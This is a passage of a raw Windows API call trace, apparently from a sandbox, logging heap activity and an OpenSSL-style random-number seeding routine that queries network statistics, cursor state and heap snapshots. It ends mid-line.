GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.080] SetLastError (dwErrCode=0x0) [0210.080] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.081] GetLastError () returned 0x0 [0210.081] SetLastError (dwErrCode=0x0) [0210.082] GetLastError () returned 0x0 [0210.082] SetLastError (dwErrCode=0x0) [0210.082] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0210.082] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0210.082] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3272828 | out: hHeap=0x750000) returned 1 [0210.082] CryptDestroyHash (hHash=0x3277d68) returned 1 [0210.082] CryptReleaseContext (hProv=0x7b20a0, dwFlags=0x0) returned 1 [0210.082] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0210.082] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0210.084] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0210.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0210.084] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0210.084] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0210.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323db00 [0210.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4a0) returned 0x32ef680 [0210.084] SetFilePointer (in: hFile=0x61c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0210.084] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0210.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x328bd38 [0210.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x30) returned 0x323da90 [0210.084] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x200) returned 0x32efb28 [0210.093] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a588 [0210.129] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d738 [0210.129] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253468 [0210.129] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x7a5a00 [0210.138] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x773540 [0210.138] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x7a5a48 [0210.138] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x7a5af0 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534b0 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x7a5a60 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x3272828 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x7a5a90 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x7a5aa8 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87078 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x32534f8 [0210.147] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a87090 [0210.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870a8 [0210.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870c0 [0210.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870d8 [0210.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x24) returned 0x3279af8 [0210.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x158) returned 0x77dd20 [0210.164] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x77dd20, Size=0x218) returned 0x32efd30 [0210.164] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x558) returned 0x3a89060 [0210.173] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870a8 | out: hHeap=0x750000) returned 1 [0210.173] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870d8 | out: hHeap=0x750000) returned 1 [0210.173] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870c0 | out: hHeap=0x750000) returned 1 [0210.173] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3279af8 | out: hHeap=0x750000) returned 1 [0210.173] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a89060 | out: hHeap=0x750000) returned 1 [0210.190] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870c0 [0210.207] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f388 [0210.225] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x3a870d8 [0210.233] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x18) returned 0x3272868 [0210.234] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x9) returned 0x3a870a8 [0210.234] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x8) returned 0x84f378 [0210.234] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10e) returned 0x3217e98 [0210.242] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0210.259] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x58) returned 0x327a5e8 [0210.268] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728a8 [0210.268] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x104) returned 0x3a86078 [0210.268] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x14) returned 0x32728c8 [0210.268] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x84f398 [0210.268] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0210.268] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870d8 | out: hHeap=0x750000) returned 1 [0210.268] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x84f378 | out: hHeap=0x750000) returned 1 [0210.269] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870a8 | out: hHeap=0x750000) returned 1 [0210.269] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3272868 | out: hHeap=0x750000) returned 1 [0210.269] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x84f388 | out: hHeap=0x750000) returned 1 [0210.269] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a870c0 | out: hHeap=0x750000) returned 1 [0210.278] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0210.278] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x327a588 | out: hHeap=0x750000) returned 1 [0210.278] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32efd30 | out: hHeap=0x750000) returned 1 [0210.286] GetCurrentThreadId () returned 0x1cc [0210.286] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x190) returned 0x32a5150 [0210.296] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x60) returned 0x82d6d0 [0210.296] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x40) returned 0x3253540 [0210.296] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc) returned 0x3a870c0 [0210.296] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x100) returned 0x3217e98 [0210.296] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x82) returned 0x7aebc0 [0210.314] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x2c) returned 0x323db38 [0210.314] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x7b20a0 [0210.314] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x148) returned 0x3227170 [0210.314] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x84f388 [0210.314] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x4) returned 0x84f378 [0210.314] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x100) returned 0x3214a10 [0210.331] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.348] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.357] GetCurrentThreadId () returned 0x1cc [0210.357] GetVersionExA (in: lpVersionInformation=0x397f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x397f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x397f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0210.357] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x75af0000 [0210.358] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x759e0000 [0210.358] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x742f0000 [0210.896] GetProcAddress (hModule=0x742f0000, lpProcName="NetStatisticsGet") returned 0x742f644f [0210.896] GetProcAddress (hModule=0x742f0000, lpProcName="NetApiBufferFree") returned 0x743213d2 [0210.896] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x397f02c | out: Buffer=0x397f02c) returned 0x0 [0210.904] GetCurrentThreadId () returned 0x1cc [0210.904] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.904] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.904] NetApiBufferFree (Buffer=0x3a80150) returned 0x0 [0210.904] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x397f02c | out: Buffer=0x397f02c) returned 0x0 [0210.920] GetCurrentThreadId () returned 0x1cc [0210.920] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.921] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.921] NetApiBufferFree (Buffer=0x327a588) returned 0x0 [0210.921] FreeLibrary (hLibModule=0x742f0000) returned 1 [0210.923] GetProcAddress (hModule=0x75af0000, lpProcName="CryptAcquireContextW") returned 0x75afdf14 [0210.923] GetProcAddress (hModule=0x75af0000, lpProcName="CryptGenRandom") returned 0x75afdfc8 [0210.924] GetProcAddress (hModule=0x75af0000, lpProcName="CryptReleaseContext") returned 0x75afe124 [0210.924] CryptAcquireContextW (in: phProv=0x397f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397f018*=0x7b2018) returned 1 [0210.925] CryptGenRandom (in: hProv=0x7b2018, dwLen=0x40, pbBuffer=0x397f464 | out: pbBuffer=0x397f464) returned 1 [0210.925] GetCurrentThreadId () returned 0x1cc [0210.925] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.925] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.925] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0210.925] CryptAcquireContextW (in: phProv=0x397f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x397f018*=0x7b2018) returned 0 [0210.925] FreeLibrary (hLibModule=0x75af0000) returned 1 [0210.925] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0210.926] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0210.926] GetDesktopWindow () returned 0x10010 [0210.926] GetProcessWindowStation () returned 0x48 [0210.926] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x397efa0 | out: pvInfo=0x0, lpnLengthNeeded=0x397efa0) returned 0 [0210.926] GetLastError () returned 0x7a [0210.926] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x397ef80, nLength=0x10, lpnLengthNeeded=0x397efa0 | out: pvInfo=0x397ef80, lpnLengthNeeded=0x397efa0) returned 1 [0210.926] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x76e00000 [0210.926] GetProcAddress (hModule=0x76e00000, lpProcName="GetForegroundWindow") returned 0x76e22320 [0210.927] GetProcAddress (hModule=0x76e00000, lpProcName="GetCursorInfo") returned 0x76e7812f [0210.927] GetProcAddress (hModule=0x76e00000, lpProcName="GetQueueStatus") returned 0x76e23924 [0210.927] GetForegroundWindow () returned 0x1005e [0210.927] GetCurrentThreadId () returned 0x1cc [0210.927] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.927] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.927] GetCursorInfo (in: pci=0x397f450 | out: pci=0x397f450) returned 1 [0210.927] GetQueueStatus (flags=0xbf) returned 0x0 [0210.927] GetCurrentThreadId () returned 0x1cc [0210.927] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.928] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.928] FreeLibrary (hLibModule=0x76e00000) returned 1 [0210.928] GetProcAddress (hModule=0x759e0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a1735f [0210.928] GetProcAddress (hModule=0x759e0000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0210.928] GetProcAddress (hModule=0x759e0000, lpProcName="Heap32First") returned 0x75a75763 [0210.929] GetProcAddress (hModule=0x759e0000, lpProcName="Heap32Next") returned 0x75a7594e [0210.929] GetProcAddress (hModule=0x759e0000, lpProcName="Heap32ListFirst") returned 0x75a75621 [0210.929] GetProcAddress (hModule=0x759e0000, lpProcName="Heap32ListNext") returned 0x75a756cb [0210.929] GetProcAddress (hModule=0x759e0000, lpProcName="Process32First") returned 0x75a18ae7 [0210.930] GetProcAddress (hModule=0x759e0000, lpProcName="Process32Next") returned 0x75a188a4 [0210.930] GetProcAddress (hModule=0x759e0000, lpProcName="Thread32First") returned 0x75a75b93 [0210.930] GetProcAddress (hModule=0x759e0000, lpProcName="Thread32Next") returned 0x75a75c3f [0210.930] GetProcAddress (hModule=0x759e0000, lpProcName="Module32First") returned 0x75a75cd9 [0210.931] GetProcAddress (hModule=0x759e0000, lpProcName="Module32Next") returned 0x75a75dc2 [0210.931] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x62c [0210.941] GetTickCount () returned 0x11388df [0210.941] Heap32ListFirst (hSnapshot=0x62c, lphl=0x397f454) returned 1 [0210.942] GetCurrentThreadId () returned 0x1cc [0210.942] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.942] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.942] Heap32First (lphe=0x397efc0, th32ProcessID=0x5e0, th32HeapID=0x750000) returned 1 [0210.969] GetCurrentThreadId () returned 0x1cc [0210.969] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.969] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.969] Heap32Next (lphe=0x397efc0) returned 1 [0210.992] GetTickCount () returned 0x113890e [0210.992] GetCurrentThreadId () returned 0x1cc [0210.992] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0210.992] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0210.992] Heap32Next (lphe=0x397efc0) returned 1 [0211.017] GetTickCount () returned 0x113892d [0211.017] GetCurrentThreadId () returned 0x1cc [0211.017] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.017] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.017] Heap32Next (lphe=0x397efc0) returned 1 [0211.042] GetTickCount () returned 0x113894c [0211.042] GetCurrentThreadId () returned 0x1cc [0211.042] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.042] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.042] Heap32Next (lphe=0x397efc0) returned 1 [0211.067] GetTickCount () returned 0x113895c [0211.067] GetCurrentThreadId () returned 0x1cc [0211.067] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.067] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.067] Heap32Next (lphe=0x397efc0) returned 1 [0211.093] GetTickCount () returned 0x113897b [0211.093] GetCurrentThreadId () returned 0x1cc [0211.093] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.093] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.093] Heap32Next (lphe=0x397efc0) returned 1 [0211.118] GetTickCount () returned 0x113899a [0211.118] GetCurrentThreadId () returned 0x1cc [0211.118] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.118] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.118] Heap32Next (lphe=0x397efc0) returned 1 [0211.142] GetTickCount () returned 0x11389aa [0211.142] GetCurrentThreadId () returned 0x1cc [0211.143] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.143] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.143] Heap32Next (lphe=0x397efc0) returned 1 [0211.170] GetTickCount () returned 0x11389c9 [0211.170] GetCurrentThreadId () returned 0x1cc [0211.171] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.171] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.171] Heap32Next (lphe=0x397efc0) returned 1 [0211.195] GetTickCount () returned 0x11389d9 [0211.195] GetCurrentThreadId () returned 0x1cc [0211.195] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.196] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.196] Heap32Next (lphe=0x397efc0) returned 1 [0211.220] GetTickCount () returned 0x11389f8 [0211.220] GetCurrentThreadId () returned 0x1cc [0211.220] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.220] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.220] Heap32Next (lphe=0x397efc0) returned 1 [0211.245] GetTickCount () returned 0x1138a17 [0211.245] GetCurrentThreadId () returned 0x1cc [0211.245] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.245] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.245] Heap32Next (lphe=0x397efc0) returned 1 [0211.270] GetTickCount () returned 0x1138a27 [0211.270] GetCurrentThreadId () returned 0x1cc [0211.270] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.270] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.270] Heap32Next (lphe=0x397efc0) returned 1 [0211.295] GetTickCount () returned 0x1138a46 [0211.295] GetCurrentThreadId () returned 0x1cc [0211.295] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.295] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.295] Heap32Next (lphe=0x397efc0) returned 1 [0211.320] GetTickCount () returned 0x1138a55 [0211.320] GetCurrentThreadId () returned 0x1cc [0211.320] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.320] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.320] Heap32Next (lphe=0x397efc0) returned 1 [0211.344] GetTickCount () returned 0x1138a75 [0211.344] GetCurrentThreadId () returned 0x1cc [0211.344] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.345] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.345] Heap32Next (lphe=0x397efc0) returned 1 [0211.369] GetTickCount () returned 0x1138a94 [0211.369] GetCurrentThreadId () returned 0x1cc [0211.369] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.369] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.370] Heap32Next (lphe=0x397efc0) returned 1 [0211.394] GetTickCount () returned 0x1138aa3 [0211.394] GetCurrentThreadId () returned 0x1cc [0211.394] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.395] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.395] Heap32Next (lphe=0x397efc0) returned 1 [0211.420] GetTickCount () returned 0x1138ac3 [0211.420] GetCurrentThreadId () returned 0x1cc [0211.420] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.420] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.420] Heap32Next (lphe=0x397efc0) returned 1 [0211.446] GetTickCount () returned 0x1138ae2 [0211.446] GetCurrentThreadId () returned 0x1cc [0211.446] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.446] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.446] Heap32Next (lphe=0x397efc0) returned 1 [0211.472] GetTickCount () returned 0x1138af1 [0211.472] GetCurrentThreadId () returned 0x1cc [0211.472] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.472] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.472] Heap32Next (lphe=0x397efc0) returned 1 [0211.497] GetTickCount () returned 0x1138b11 [0211.497] GetCurrentThreadId () returned 0x1cc [0211.497] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.497] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.497] Heap32Next (lphe=0x397efc0) returned 1 [0211.521] GetTickCount () returned 0x1138b20 [0211.521] GetCurrentThreadId () returned 0x1cc [0211.521] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.521] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.521] Heap32Next (lphe=0x397efc0) returned 1 [0211.548] GetTickCount () returned 0x1138b3f [0211.548] GetCurrentThreadId () returned 0x1cc [0211.548] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.548] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.548] Heap32Next (lphe=0x397efc0) returned 1 [0211.575] GetTickCount () returned 0x1138b5f [0211.575] GetCurrentThreadId () returned 0x1cc [0211.575] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.575] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.575] Heap32Next (lphe=0x397efc0) returned 1 [0211.599] GetTickCount () returned 0x1138b6e [0211.599] GetCurrentThreadId () returned 0x1cc [0211.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.599] Heap32Next (lphe=0x397efc0) returned 1 [0211.624] GetTickCount () returned 0x1138b8d [0211.624] GetCurrentThreadId () returned 0x1cc [0211.624] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.624] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.624] Heap32Next (lphe=0x397efc0) returned 1 [0211.650] GetTickCount () returned 0x1138bad [0211.650] GetCurrentThreadId () returned 0x1cc [0211.650] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.650] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.650] Heap32Next (lphe=0x397efc0) returned 1 [0211.675] GetTickCount () returned 0x1138bbc [0211.675] GetCurrentThreadId () returned 0x1cc [0211.675] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.675] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.675] Heap32Next (lphe=0x397efc0) returned 1 [0211.700] GetTickCount () returned 0x1138bdb [0211.700] GetCurrentThreadId () returned 0x1cc [0211.700] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x64) returned 0x8240a0 [0211.700] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x8240a0 | out: hHeap=0x750000) returned 1 [0211.700] Heap32Next (lphe=0x397efc0) returned 1 [0211.726] GetTickCount () returned 0x1138bfb [0211.726] GetCurrentThreadId () returned 0x1cc [0211.726] RtlAllocateHeap (HeapHandle=0x750000, 